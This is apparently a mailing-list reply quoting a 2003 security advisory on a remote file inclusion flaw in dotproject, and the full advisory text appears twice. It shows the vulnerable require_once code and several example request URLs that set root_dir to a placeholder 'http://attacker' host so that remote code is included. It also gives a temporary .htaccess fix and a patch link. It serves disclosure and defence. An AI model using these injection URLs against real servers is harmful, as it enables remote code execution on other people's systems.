A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (english
version) .
>From: mindwarper (at) hush (dot) com [email concealed]
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: dotproject Remote Code Execution Vulnerability
>Date: Wed, 29 Jan 2003 04:02:24 -0800
>
>dotproject Remote Code Execution Vulnerability (By Mindwarper)
>
><------- ------->
>
>----------------------
>Vendor Information:
>----------------------
>
>Homepage : http://www.dotproject.net
>Vendor : informed
>Mailed advisory: 28/01/03
>Vender Response : None
>
>
>----------------------
>Affected Versions:
>----------------------
>
>dev20030121
>
>
>----------------------
>Vulnerability:
>----------------------
>
>
>dotproject is a PHP+MySQL beta level web based project management and
>tracking tool
>that dotmarketing started in Dec. 2000.
>Inside the directory /modules/ multiple files try to include
>classdefs/date.php
>without defining $root_dir first and allow remote attackers to inject their
>own
>servers if globals are set on.
>
>Example Code from modules/projects/addedit.php:
>
>******
>
><?php
>##
>## Files modules: index page re-usable sub-table
>##
>
>require_once( "$root_dir/classdefs/date.php" );
>$df = $AppUI->getPref('SHDATEFORMAT');
>$tf = $AppUI->getPref('TIMEFORMAT');
>
>******
>
>As you can see nothing happens before the require_once function is called
>and therefore
>with globals set on an attacker may include remote files.
>
>Example:
>
>http://victim/dotproject/modules/files/index_table.php?root_dir=http://
attacker
>
>this works also on
>
>http://victim/dotproject/modules/projects/addedit.php?root_dir=http://a
ttacker
>http://victim/dotproject/modules/projects/view.php?root_dir=http://atta
cker
>http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://
attacker
>http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://atta
cker
>http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://at
tacker
>
>
>----------------------
>Solution:
>----------------------
>
>Please check the vendor's website for new patches.
>
>As a temporary solution, create a .htaccess file that contains 'Deny from
>all'.
>Place it in the /modules/ directory and that should block remote users from
>accessing it.
>
>
>----------------------
>Contact:
>----------------------
>
>Name: Mindwarper
>Email: mindwarper (at) hush (dot) com [email concealed]
>Website: http://mindlock.bestweb.net
>
>
><------- ------->
>
>
>
>
>Concerned about your privacy? Follow this link to get
>FREE encrypted email: https://www.hushmail.com/?l=2
>
>Big $$$ to be made with the HushMail Affiliate Program:
>https://www.hushmail.com/about.php?subloc=affiliate&l=427
A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (english
version) .
>From: mindwarper (at) hush (dot) com [email concealed]
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: dotproject Remote Code Execution Vulnerability
>Date: Wed, 29 Jan 2003 04:02:24 -0800
>
>dotproject Remote Code Execution Vulnerability (By Mindwarper)
>
><------- ------->
>
>----------------------
>Vendor Information:
>----------------------
>
>Homepage : http://www.dotproject.net
>Vendor : informed
>Mailed advisory: 28/01/03
>Vender Response : None
>
>
>----------------------
>Affected Versions:
>----------------------
>
>dev20030121
>
>
>----------------------
>Vulnerability:
>----------------------
>
>
>dotproject is a PHP+MySQL beta level web based project management and
>tracking tool
>that dotmarketing started in Dec. 2000.
>Inside the directory /modules/ multiple files try to include
>classdefs/date.php
>without defining $root_dir first and allow remote attackers to inject their
>own
>servers if globals are set on.
>
>Example Code from modules/projects/addedit.php:
>
>******
>
><?php
>##
>## Files modules: index page re-usable sub-table
>##
>
>require_once( "$root_dir/classdefs/date.php" );
>$df = $AppUI->getPref('SHDATEFORMAT');
>$tf = $AppUI->getPref('TIMEFORMAT');
>
>******
>
>As you can see nothing happens before the require_once function is called
>and therefore
>with globals set on an attacker may include remote files.
>
>Example:
>
>http://victim/dotproject/modules/files/index_table.php?root_dir=http://
attacker
>
>this works also on
>
>http://victim/dotproject/modules/projects/addedit.php?root_dir=http://a
ttacker
>http://victim/dotproject/modules/projects/view.php?root_dir=http://atta
cker
>http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://
attacker
>http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://atta
cker
>http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://at
tacker
>
>
>----------------------
>Solution:
>----------------------
>
>Please check the vendor's website for new patches.
>
>As a temporary solution, create a .htaccess file that contains 'Deny from
>all'.
>Place it in the /modules/ directory and that should block remote users from
>accessing it.
>
>
>----------------------
>Contact:
>----------------------
>
>Name: Mindwarper
>Email: mindwarper (at) hush (dot) com [email concealed]
>Website: http://mindlock.bestweb.net
>
>
><------- ------->
>
>
>
>
>Concerned about your privacy? Follow this link to get
>FREE encrypted email: https://www.hushmail.com/?l=2
>
>Big $$$ to be made with the HushMail Affiliate Program:
>https://www.hushmail.com/about.php?subloc=affiliate&l=427
_________________________________________________________________
[ reply ]